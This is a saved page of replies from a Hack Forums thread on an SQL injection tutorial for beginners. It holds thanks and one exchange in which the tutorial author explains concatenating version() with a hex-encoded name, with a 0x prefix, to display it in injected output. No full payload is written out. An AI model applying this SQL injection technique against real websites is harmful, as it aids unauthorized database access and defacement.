<a href="http://www.hackforums.net/showthread.php?tid=3819819" target="_blank">http://www.hackforums.net/showthread.php?tid=3819819</a><br>
</div></div>
<!-- end: postbit_signature -->

				<div class="post_meta" id="post_meta_25733563">
				
				</div>
			</td>
		</tr>

		<tr>
			<td class="trow1 post_buttons ">
				<div class="author_buttons float_left">
					<!-- start: postbit_pm -->
<a href="http://www.hackforums.net/private.php?action=send&uid=949543" class="bitButton" rel="nofollow" title="Send this user a private message">PM</a>
<!-- end: postbit_pm --><!-- start: postbit_find -->
<a href="http://www.hackforums.net/search.php?action=finduser&uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a>
<!-- end: postbit_find -->
				</div>
				<div class="post_management_buttons float_right"><!-- start: postbit_quote -->
<a href="http://www.hackforums.net/newreply.php?tid=2798495&replyto=25733563" class="bitButton" rel="nofollow">Quote</a>
<!-- end: postbit_quote --><!-- start: postbit_report -->
<a href="javascript:Thread.reportPost(25733563);" class="bitButton" rel="nofollow" title="Report this post to a moderator">Report</a>
<!-- end: postbit_report -->
				</div>
			</td>
		</tr>
	</tbody>
</table>
<!-- end: postbit --><!-- start: postbit -->

<a name="pid25733595" id="pid25733595"></a>
<table border="0" cellspacing="1" cellpadding="4" class="tborder" style="margin-top: 5px; " id="post_25733595">
	<tbody>
		<tr>
			<td class="tcat">
				<div class="float_left smalltext">
					08-21-2012, 12:14 PM <span id="edited_by_25733595"></span>
				</div>
				<!-- start: postbit_posturl -->
<div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2798495&pid=25733595#pid25733595">#4</a></strong></span></div>
<!-- end: postbit_posturl -->
			</td>
		</tr>

		<tr>
			<td class="trow1 ">
				<table cellspacing="0" cellpadding="0" border="0" style="width: 100%;">
					<tbody><tr>
						<td class="post_avatar" width="1" style="">
							
						</td>
						<td class="post_author">
							<strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&uid=1371400"><span style="color:#383838">literalraise</span></a></span></strong> <!-- start: postbit_offline -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/buddy_offline.gif" title="Offline" alt="Offline">
<!-- end: postbit_offline --><br>
							<span class="smalltext">
								Closed Account<br>
								<span class="userstars"></span>
								
							</span>
						</td>
						<td class="smalltext post_author_info" width="165">
							Prestige: 4<br><!-- start: postbit_author_user -->

	Posts: 79<br>
	Joined: Jul 2012
	<!-- start: postbit_reputation -->
<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1371400"><strong class="reputation_neutral">0</strong></a>
<!-- end: postbit_reputation -->
<!-- end: postbit_author_user --><br>
						</td>
					</tr>
				</tbody></table>
			</td>
		</tr>

		<tr>
			<td class="trow2 post_content ">


				<div class="post_body" id="pid_25733595">
					good tutorial HQ :) like that &lt;br&gt; trick
				</div>
				
				

				<div class="post_meta" id="post_meta_25733595">
				
				</div>
			</td>
		</tr>

		<tr>
			<td class="trow1 post_buttons ">
				<div class="author_buttons float_left">
					<!-- start: postbit_pm -->
<a href="http://www.hackforums.net/private.php?action=send&uid=1371400" class="bitButton" rel="nofollow" title="Send this user a private message">PM</a>
<!-- end: postbit_pm --><!-- start: postbit_find -->
<a href="http://www.hackforums.net/search.php?action=finduser&uid=1371400" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a>
<!-- end: postbit_find -->
				</div>
				<div class="post_management_buttons float_right"><!-- start: postbit_quote -->
<a href="http://www.hackforums.net/newreply.php?tid=2798495&replyto=25733595" class="bitButton" rel="nofollow">Quote</a>
<!-- end: postbit_quote --><!-- start: postbit_report -->
<a href="javascript:Thread.reportPost(25733595);" class="bitButton" rel="nofollow" title="Report this post to a moderator">Report</a>
<!-- end: postbit_report -->
				</div>
			</td>
		</tr>
	</tbody>
</table>
<!-- end: postbit --><!-- start: postbit -->

<a name="pid25757524" id="pid25757524"></a>
<table border="0" cellspacing="1" cellpadding="4" class="tborder" style="margin-top: 5px; " id="post_25757524">
	<tbody>
		<tr>
			<td class="tcat">
				<div class="float_left smalltext">
					08-22-2012, 08:12 AM <span id="edited_by_25757524"></span>
				</div>
				<!-- start: postbit_posturl -->
<div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2798495&pid=25757524#pid25757524">#5</a></strong></span></div>
<!-- end: postbit_posturl -->
			</td>
		</tr>

		<tr>
			<td class="trow1 ">
				<table cellspacing="0" cellpadding="0" border="0" style="width: 100%;">
					<tbody><tr>
						<td class="post_avatar" width="1" style="padding-right: 10px;">
							<!-- start: postbit_avatar -->
<a href="http://www.hackforums.net/member.php?action=profile&uid=1208053"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/image.jpg" alt="" width="86" height="100"></a>
<!-- end: postbit_avatar -->
						</td>
						<td class="post_author">
							<strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&uid=1208053"><span class="group2">haczord</span></a></span></strong> <!-- start: postbit_offline -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/buddy_offline.gif" title="Offline" alt="Offline">
<!-- end: postbit_offline --><br>
							<span class="smalltext">
								Mentat<br>
								<span class="userstars"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><br></span>
								
							</span>
						</td>
						<td class="smalltext post_author_info" width="165">
							Prestige: 17<br><!-- start: postbit_author_user -->

	Posts: 305<br>
	Joined: Mar 2012
	<!-- start: postbit_reputation -->
<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1208053"><strong class="reputation_positive">6</strong></a>
<!-- end: postbit_reputation -->
<!-- end: postbit_author_user --><br>
						</td>
					</tr>
				</tbody></table>
			</td>
		</tr>

		<tr>
			<td class="trow2 post_content ">


				<div class="post_body" id="pid_25757524">
					good tutorial but how to display our name next to the version
				</div>
				
				<!-- start: postbit_signature -->
<hr style="width: 20%;background: #000;">
<div style="overflow:hidden; max-height:200px;"><span style="font-size: xx-large;"><span style="color: #FF0000;"><div style="text-align: center;"><span style="font-weight: bold;">HacZorD</span></div></span></span></div>
<!-- end: postbit_signature -->

				<div class="post_meta" id="post_meta_25757524">
				
				</div>
			</td>
		</tr>

		<tr>
			<td class="trow1 post_buttons ">
				<div class="author_buttons float_left">
					<!-- start: postbit_pm -->
<a href="http://www.hackforums.net/private.php?action=send&uid=1208053" class="bitButton" rel="nofollow" title="Send this user a private message">PM</a>
<!-- end: postbit_pm --><!-- start: postbit_find -->
<a href="http://www.hackforums.net/search.php?action=finduser&uid=1208053" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a>
<!-- end: postbit_find -->
				</div>
				<div class="post_management_buttons float_right"><!-- start: postbit_quote -->
<a href="http://www.hackforums.net/newreply.php?tid=2798495&replyto=25757524" class="bitButton" rel="nofollow">Quote</a>
<!-- end: postbit_quote --><!-- start: postbit_report -->
<a href="javascript:Thread.reportPost(25757524);" class="bitButton" rel="nofollow" title="Report this post to a moderator">Report</a>
<!-- end: postbit_report -->
				</div>
			</td>
		</tr>
	</tbody>
</table>
<!-- end: postbit --><!-- start: postbit -->

<a name="pid25763081" id="pid25763081"></a>
<table border="0" cellspacing="1" cellpadding="4" class="tborder" style="margin-top: 5px; " id="post_25763081">
	<tbody>
		<tr>
			<td class="tcat">
				<div class="float_left smalltext">
					08-22-2012, 12:07 PM <span id="edited_by_25763081"></span>
				</div>
				<!-- start: postbit_posturl -->
<div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2798495&pid=25763081#pid25763081">#6</a></strong></span></div>
<!-- end: postbit_posturl -->
			</td>
		</tr>

		<tr>
			<td class="trow1 ">
				<table cellspacing="0" cellpadding="0" border="0" style="width: 100%;">
					<tbody><tr>
						<td class="post_avatar" width="1" style="padding-right: 10px;">
							<!-- start: postbit_avatar -->
<a href="http://www.hackforums.net/member.php?action=profile&uid=890826"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/avatar_890826.jpg" alt="" width="80" height="100"></a>
<!-- end: postbit_avatar -->
						</td>
						<td class="post_author">
							<strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&uid=890826"><span class="group9">DEX|TER</span></a></span></strong> <!-- start: postbit_offline -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/buddy_offline.gif" title="Offline" alt="Offline">
<!-- end: postbit_offline --><br>
							<span class="smalltext">
								Sorrow<br>
								<span class="userstars"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starl33t.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starl33t.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starl33t.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starl33t.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starl33t.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starl33t.png" border="0" alt="*"><br></span>
								<!-- start: postbit_groupimage -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/hf_l33t.png" alt="HF l33t" title="HF l33t">
<!-- end: postbit_groupimage -->
							</span>
						</td>
						<td class="smalltext post_author_info" width="165">
							Prestige: 22<br><!-- start: postbit_author_user -->

	Posts: 488<br>
	Joined: Jul 2011
	<!-- start: postbit_reputation -->
<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=890826"><strong class="reputation_positive">12</strong></a>
<!-- end: postbit_reputation -->
<!-- end: postbit_author_user --><br>
						</td>
					</tr>
				</tbody></table>
			</td>
		</tr>

		<tr>
			<td class="trow2 post_content ">


				<div class="post_body" id="pid_25763081">
					Very good, thats true. i will check it soon.
				</div>
				
				

				<div class="post_meta" id="post_meta_25763081">
				
				</div>
			</td>
		</tr>

		<tr>
			<td class="trow1 post_buttons ">
				<div class="author_buttons float_left">
					<!-- start: postbit_pm -->
<a href="http://www.hackforums.net/private.php?action=send&uid=890826" class="bitButton" rel="nofollow" title="Send this user a private message">PM</a>
<!-- end: postbit_pm --><!-- start: postbit_find -->
<a href="http://www.hackforums.net/search.php?action=finduser&uid=890826" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a>
<!-- end: postbit_find -->
				</div>
				<div class="post_management_buttons float_right"><!-- start: postbit_quote -->
<a href="http://www.hackforums.net/newreply.php?tid=2798495&replyto=25763081" class="bitButton" rel="nofollow">Quote</a>
<!-- end: postbit_quote --><!-- start: postbit_report -->
<a href="javascript:Thread.reportPost(25763081);" class="bitButton" rel="nofollow" title="Report this post to a moderator">Report</a>
<!-- end: postbit_report -->
				</div>
			</td>
		</tr>
	</tbody>
</table>
<!-- end: postbit --><!-- start: postbit -->

<a name="pid25764412" id="pid25764412"></a>
<table border="0" cellspacing="1" cellpadding="4" class="tborder" style="margin-top: 5px; " id="post_25764412">
	<tbody>
		<tr>
			<td class="tcat">
				<div class="float_left smalltext">
					08-22-2012, 12:57 PM <span id="edited_by_25764412"></span>
				</div>
				<!-- start: postbit_posturl -->
<div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2798495&pid=25764412#pid25764412">#7</a></strong></span></div>
<!-- end: postbit_posturl -->
			</td>
		</tr>

		<tr>
			<td class="trow1 ">
				<table cellspacing="0" cellpadding="0" border="0" style="width: 100%;">
					<tbody><tr>
						<td class="post_avatar" width="1" style="padding-right: 10px;">
							<!-- start: postbit_avatar -->
<a href="http://www.hackforums.net/member.php?action=profile&uid=949543"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/avatar_949543.png" alt="" width="100" height="100"></a>
<!-- end: postbit_avatar -->
						</td>
						<td class="post_author">
							<strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&uid=949543"><span class="group29">ajkaro</span></a></span></strong> <!-- start: postbit_offline -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/buddy_offline.gif" title="Offline" alt="Offline">
<!-- end: postbit_offline --><br>
							<span class="smalltext">
								Ub3r Member<br>
								<span class="userstars"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><br></span>
								<!-- start: postbit_groupimage -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r">
<!-- end: postbit_groupimage -->
							</span>
						</td>
						<td class="smalltext post_author_info" width="165">
							Prestige: 136<br><!-- start: postbit_author_user -->

	Posts: 2,153<br>
	Joined: Aug 2011
	<!-- start: postbit_reputation -->
<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">213</strong></a>
<!-- end: postbit_reputation -->
<!-- end: postbit_author_user --><br><span style="white-space:normal; width: 100%;"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span>
						</td>
					</tr>
				</tbody></table>
			</td>
		</tr>

		<tr>
			<td class="trow2 post_content ">


				<div class="post_body" id="pid_25764412">
					<blockquote><cite><span> (08-22-2012 08:12 AM)</span>haczord Wrote: <a href="http://www.hackforums.net/showthread.php?pid=25757524#pid25757524" class="quick_jump">►</a></cite>good tutorial but how to display our name next to the version</blockquote>
<br>
Same as in example 1. Use function <span style="font-weight: bold;"><span style="color: #00BFFF;">concat</span></span> to concatenate version() with your name in hex. Don't forget <span style="font-weight: bold;"><span style="color: #32CD32;">0x</span></span> for hex prefix before your name in hex value.
				</div>
				
				<!-- start: postbit_signature -->
<hr style="width: 20%;background: #000;">
<div style="overflow:hidden; max-height:200px;"><div style="text-align: center;"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/5d05c33f99f9be469b8e7145660bbe92.png" border="0" alt="[Image: 5d05c33f99f9be469b8e7145660bbe92.png]"><br>
<span style="color: #32CD32;"><span style="font-weight: bold;">my SQLi tutorials collection:</span></span><br>
<a href="http://www.hackforums.net/showthread.php?tid=3819819" target="_blank">http://www.hackforums.net/showthread.php?tid=3819819</a><br>
</div></div>
<!-- end: postbit_signature -->

				<div class="post_meta" id="post_meta_25764412">
				
				</div>
			</td>
		</tr>

		<tr>
			<td class="trow1 post_buttons ">
				<div class="author_buttons float_left">
					<!-- start: postbit_pm -->
<a href="http://www.hackforums.net/private.php?action=send&uid=949543" class="bitButton" rel="nofollow" title="Send this user a private message">PM</a>
<!-- end: postbit_pm --><!-- start: postbit_find -->
<a href="http://www.hackforums.net/search.php?action=finduser&uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a>
<!-- end: postbit_find -->
				</div>
				<div class="post_management_buttons float_right"><!-- start: postbit_quote -->
<a href="http://www.hackforums.net/newreply.php?tid=2798495&replyto=25764412" class="bitButton" rel="nofollow">Quote</a>
<!-- end: postbit_quote --><!-- start: postbit_report -->
<a href="javascript:Thread.reportPost(25764412);" class="bitButton" rel="nofollow" title="Report this post to a moderator">Report</a>
<!-- end: postbit_report -->
				</div>
			</td>
		</tr>
	</tbody>
</table>
<!-- end: postbit --><!-- start: postbit -->

<a name="pid25784751" id="pid25784751"></a>
<table border="0" cellspacing="1" cellpadding="4" class="tborder" style="margin-top: 5px; " id="post_25784751">
	<tbody>
		<tr>
			<td class="tcat">
				<div class="float_left smalltext">
					08-23-2012, 07:03 AM <span id="edited_by_25784751"><!-- start: postbit_editedby -->
<span class="smalltext">(This post was last modified: 08-23-2012 07:03 AM by <a href="http://www.hackforums.net/member.php?action=profile&uid=1218333">Dumpface</a>.)</span>


<!-- end: postbit_editedby --></span>
				</div>
				<!-- start: postbit_posturl -->
<div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2798495&pid=25784751#pid25784751">#8</a></strong></span></div>
<!-- end: postbit_posturl -->
			</td>
		</tr>

		<tr>
			<td class="trow1 ">
				<table cellspacing="0" cellpadding="0" border="0" style="width: 100%;">
					<tbody><tr>
						<td class="post_avatar" width="1" style="">
							
						</td>
						<td class="post_author">
							<strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&uid=1218333"><span class="group2">Dumpface</span></a></span></strong> <!-- start: postbit_offline -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/buddy_offline.gif" title="Offline" alt="Offline">
<!-- end: postbit_offline --><br>
							<span class="smalltext">
								Powindah<br>
								<span class="userstars"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><br></span>
								
							</span>
						</td>
						<td class="smalltext post_author_info" width="165">
							Prestige: 3<br><!-- start: postbit_author_user -->

	Posts: 49<br>
	Joined: Mar 2012
	<!-- start: postbit_reputation -->
<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1218333"><strong class="reputation_neutral">0</strong></a>
<!-- end: postbit_reputation -->
<!-- end: postbit_author_user --><br>
						</td>
					</tr>
				</tbody></table>
			</td>
		</tr>

		<tr>
			<td class="trow2 post_content ">


				<div class="post_body" id="pid_25784751">
					Thank you. This helped me brother :)
				</div>
				
				

				<div class="post_meta" id="post_meta_25784751">
				
				</div>
			</td>
		</tr>

		<tr>
			<td class="trow1 post_buttons ">
				<div class="author_buttons float_left">
					<!-- start: postbit_pm -->
<a href="http://www.hackforums.net/private.php?action=send&uid=1218333" class="bitButton" rel="nofollow" title="Send this user a private message">PM</a>
<!-- end: postbit_pm --><!-- start: postbit_find -->
<a href="http://www.hackforums.net/search.php?action=finduser&uid=1218333" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a>
<!-- end: postbit_find -->
				</div>
				<div class="post_management_buttons float_right"><!-- start: postbit_quote -->
<a href="http://www.hackforums.net/newreply.php?tid=2798495&replyto=25784751" class="bitButton" rel="nofollow">Quote</a>
<!-- end: postbit_quote --><!-- start: postbit_report -->
<a href="javascript:Thread.reportPost(25784751);" class="bitButton" rel="nofollow" title="Report this post to a moderator">Report</a>
<!-- end: postbit_report -->
				</div>
			</td>
		</tr>
	</tbody>
</table>
<!-- end: postbit --><!-- start: postbit -->

<a name="pid25790841" id="pid25790841"></a>
<table border="0" cellspacing="1" cellpadding="4" class="tborder" style="margin-top: 5px; " id="post_25790841">
	<tbody>
		<tr>
			<td class="tcat">
				<div class="float_left smalltext">
					08-23-2012, 11:33 AM <span id="edited_by_25790841"></span>
				</div>
				<!-- start: postbit_posturl -->
<div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2798495&pid=25790841#pid25790841">#9</a></strong></span></div>
<!-- end: postbit_posturl -->
			</td>
		</tr>

		<tr>
			<td class="trow1 ">
				<table cellspacing="0" cellpadding="0" border="0" style="width: 100%;">
					<tbody><tr>
						<td class="post_avatar" width="1" style="padding-right: 10px;">
							<!-- start: postbit_avatar -->
<a href="http://www.hackforums.net/member.php?action=profile&uid=1208053"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/image.jpg" alt="" width="86" height="100"></a>
<!-- end: postbit_avatar -->
						</td>
						<td class="post_author">
							<strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&uid=1208053"><span class="group2">haczord</span></a></span></strong> <!-- start: postbit_offline -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/buddy_offline.gif" title="Offline" alt="Offline">
<!-- end: postbit_offline --><br>
							<span class="smalltext">
								Mentat<br>
								<span class="userstars"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><br></span>
								
							</span>
						</td>
						<td class="smalltext post_author_info" width="165">
							Prestige: 17<br><!-- start: postbit_author_user -->

	Posts: 305<br>
	Joined: Mar 2012
	<!-- start: postbit_reputation -->
<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1208053"><strong class="reputation_positive">6</strong></a>
<!-- end: postbit_reputation -->
<!-- end: postbit_author_user --><br>
						</td>
					</tr>
				</tbody></table>
			</td>
		</tr>

		<tr>
			<td class="trow2 post_content ">


				<div class="post_body" id="pid_25790841">
					<blockquote><cite><span> (08-22-2012 12:57 PM)</span>ajkaro Wrote: <a href="http://www.hackforums.net/showthread.php?pid=25764412#pid25764412" class="quick_jump">►</a></cite>Same as in example 1. Use function <span style="font-weight: bold;"><span style="color: #00BFFF;">concat</span></span> to concatenate version() with your name in hex. Don't forget <span style="font-weight: bold;"><span style="color: #32CD32;">0x</span></span> for hex prefix before your name in hex value.</blockquote>
<br>
thank you so much,<br>
i'm learning so much from your challenges and tutorial
				</div>
				
				<!-- start: postbit_signature -->
<hr style="width: 20%;background: #000;">
<div style="overflow:hidden; max-height:200px;"><span style="font-size: xx-large;"><span style="color: #FF0000;"><div style="text-align: center;"><span style="font-weight: bold;">HacZorD</span></div></span></span></div>
<!-- end: postbit_signature -->

				<div class="post_meta" id="post_meta_25790841">
				
				</div>
			</td>
		</tr>

		<tr>
			<td class="trow1 post_buttons ">
				<div class="author_buttons float_left">
					<!-- start: postbit_pm -->
<a href="http://www.hackforums.net/private.php?action=send&uid=1208053" class="bitButton" rel="nofollow" title="Send this user a private message">PM</a>
<!-- end: postbit_pm --><!-- start: postbit_find -->
<a href="http://www.hackforums.net/search.php?action=finduser&uid=1208053" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a>
<!-- end: postbit_find -->
				</div>
				<div class="post_management_buttons float_right"><!-- start: postbit_quote -->
<a href="http://www.hackforums.net/newreply.php?tid=2798495&replyto=25790841" class="bitButton" rel="nofollow">Quote</a>
<!-- end: postbit_quote --><!-- start: postbit_report -->
<a href="javascript:Thread.reportPost(25790841);" class="bitButton" rel="nofollow" title="Report this post to a moderator">Report</a>
<!-- end: postbit_report -->
				</div>
			</td>
		</tr>
	</tbody>
</table>
<!-- end: postbit --><!-- start: postbit -->

<a name="pid25803029" id="pid25803029"></a>
<table border="0" cellspacing="1" cellpadding="4" class="tborder" style="margin-top: 5px; " id="post_25803029">
	<tbody>
		<tr>
			<td class="tcat">
				<div class="float_left smalltext">
					08-23-2012, 08:15 PM <span id="edited_by_25803029"></span>
				</div>
				<!-- start: postbit_posturl -->
<div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2798495&pid=25803029#pid25803029">#10</a></strong></span></div>
<!-- end: postbit_posturl -->
			</td>
		</tr>

		<tr>
			<td class="trow1 ">
				<table cellspacing="0" cellpadding="0" border="0" style="width: 100%;">
					<tbody><tr>
						<td class="post_avatar" width="1" style="">
							
						</td>
						<td class="post_author">
							<strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&uid=868609"><span class="group2">mirkops</span></a></span></strong> <!-- start: postbit_offline -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/buddy_offline.gif" title="Offline" alt="Offline">
<!-- end: postbit_offline --><br>
							<span class="smalltext">
								Mentat<br>
								<span class="userstars"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starreg.png" border="0" alt="*"><br></span>
								
							</span>
						</td>
						<td class="smalltext post_author_info" width="165">
							Prestige: 14<br><!-- start: postbit_author_user -->

	Posts: 500<br>
	Joined: Jun 2011
	<!-- start: postbit_reputation -->
<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=868609"><strong class="reputation_positive">1</strong></a>
<!-- end: postbit_reputation -->
<!-- end: postbit_author_user --><br>
						</td>
					</tr>
				</tbody></table>
			</td>
		</tr>

		<tr>
			<td class="trow2 post_content ">


				<div class="post_body" id="pid_25803029">
					interesting..amazing man..learning ...cool
				</div>
				
				

				<div class="post_meta" id="post_meta_25803029">
				
				</div>
			</td>
		</tr>

		<tr>
			<td class="trow1 post_buttons ">
				<div class="author_buttons float_left">
					<!-- start: postbit_pm -->
<a href="http://www.hackforums.net/private.php?action=send&uid=868609" class="bitButton" rel="nofollow" title="Send this user a private message">PM</a>
<!-- end: postbit_pm --><!-- start: postbit_find -->
<a href="http://www.hackforums.net/search.php?action=finduser&uid=868609" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a>
<!-- end: postbit_find -->
				</div>
				<div class="post_management_buttons float_right"><!-- start: postbit_quote -->
<a href="http://www.hackforums.net/newreply.php?tid=2798495&replyto=25803029" class="bitButton" rel="nofollow">Quote</a>
<!-- end: postbit_quote --><!-- start: postbit_report -->
<a href="javascript:Thread.reportPost(25803029);" class="bitButton" rel="nofollow" title="Report this post to a moderator">Report</a>
<!-- end: postbit_report -->
				</div>
			</td>
		</tr>
	</tbody>
</table>
<!-- end: postbit -->
	</div>
	<table border="0" cellspacing="1" cellpadding="4" class="tborder" style="border-top-width: 0;">
		<tbody><tr>
			<td colspan="2" class="tfoot">
				<!-- start: showthread_search -->
	<div class="float_right">
		<form action="http://www.hackforums.net/search.php" method="post">
			<input type="hidden" name="action" value="thread">
			<input type="hidden" name="tid" value="2798495">
			<input type="text" name="keywords" value="Enter Keywords" onfocus="if(this.value == &#39;Enter Keywords&#39;) { this.value = &#39;&#39;; }" onblur="if(this.value==&#39;&#39;) { this.value=&#39;Enter Keywords&#39;; }" class="textbox" size="25">
			<input type="submit" class="button" value="Search Thread">
		</form>
	</div>
<!-- end: showthread_search -->
				<div>
					<strong>« <a href="http://www.hackforums.net/showthread.php?tid=2798495&action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=2798495&action=nextnewest">Next Newest</a> »</strong>
				</div>
			</td>
		</tr>
	</tbody></table>
	<div class="float_left">
		<!-- start: multipage -->
<div class="pagination">
<span class="pages">Pages (6):</span>
<!-- start: multipage_page_current -->
 <span class="pagination_current">1</span>
<!-- end: multipage_page_current --><!-- start: multipage_page -->
<a href="http://www.hackforums.net/showthread.php?tid=2798495&page=2" class="pagination_page">2</a>
<!-- end: multipage_page --><!-- start: multipage_page -->
<a href="http://www.hackforums.net/showthread.php?tid=2798495&page=3" class="pagination_page">3</a>
<!-- end: multipage_page --><!-- start: multipage_page -->
<a href="http://www.hackforums.net/showthread.php?tid=2798495&page=4" class="pagination_page">4</a>
<!-- end: multipage_page --><!-- start: multipage_page -->
<a href="http://www.hackforums.net/showthread.php?tid=2798495&page=5" class="pagination_page">5</a>
<!-- end: multipage_page --><!-- start: multipage_end -->
 <a href="http://www.hackforums.net/showthread.php?tid=2798495&page=6" class="pagination_last">6</a>
<!-- end: multipage_end --><!-- start: multipage_nextpage -->
<a href="http://www.hackforums.net/showthread.php?tid=2798495&page=2" class="pagination_next">Next »</a>
<!-- end: multipage_nextpage -->
</div>
<!-- end: multipage -->
	</div>
	<div style="padding-top: 4px;" class="float_right">
		<!-- start: showthread_newreply -->
<a href="http://www.hackforums.net/newreply.php?tid=2798495" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a>
<!-- end: showthread_newreply -->
	</div>
	<br style="clear: both;">
	<!-- start: showthread_quickreply -->
<br>
<form method="post" action="http://www.hackforums.net/newreply.php?tid=2798495&processed=1" name="quick_reply_form" id="quick_reply_form">
	<input type="hidden" name="my_post_key" value="111c6251d6ef052e4fa64dde874f3290">
	<input type="hidden" name="subject" value="*">
	<input type="hidden" name="action" value="do_newreply">
	<input type="hidden" name="posthash" value="bcc34bc080741bc0ff0fa850d63e30d5" id="posthash">
	<input type="hidden" name="quoted_ids" value="" id="quoted_ids">
	<input type="hidden" name="lastpid" id="lastpid" value="37649809">
	<input type="hidden" name="from_page" value="1">
	<input type="hidden" name="tid" value="2798495">
	<input type="hidden" name="method" value="quickreply">

	<table border="0" cellspacing="1" cellpadding="4" class="tborder">
		<thead>
			<tr>
				<td class="thead" colspan="2">
					<div class="expcolimage"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/collapse.gif" id="quickreply_img" class="expander" alt="[-]" title="[-]" style="cursor: pointer;"></div>
					<div><strong>Quick Reply</strong></div>
				</td>
			</tr>
		</thead>
		<tbody style="" id="quickreply_e">
			<tr>
				<td class="trow1" valign="top" width="22%">
					<strong>Message</strong><br>
					<span class="smalltext">Type your reply to this message here.<br><br>
					<!-- start: showthread_quickreply_options_signature -->
<label><input type="checkbox" class="checkbox" name="postoptions[signature]" value="1">&nbsp;<strong>Signature</strong></label><br>
<!-- end: showthread_quickreply_options_signature -->
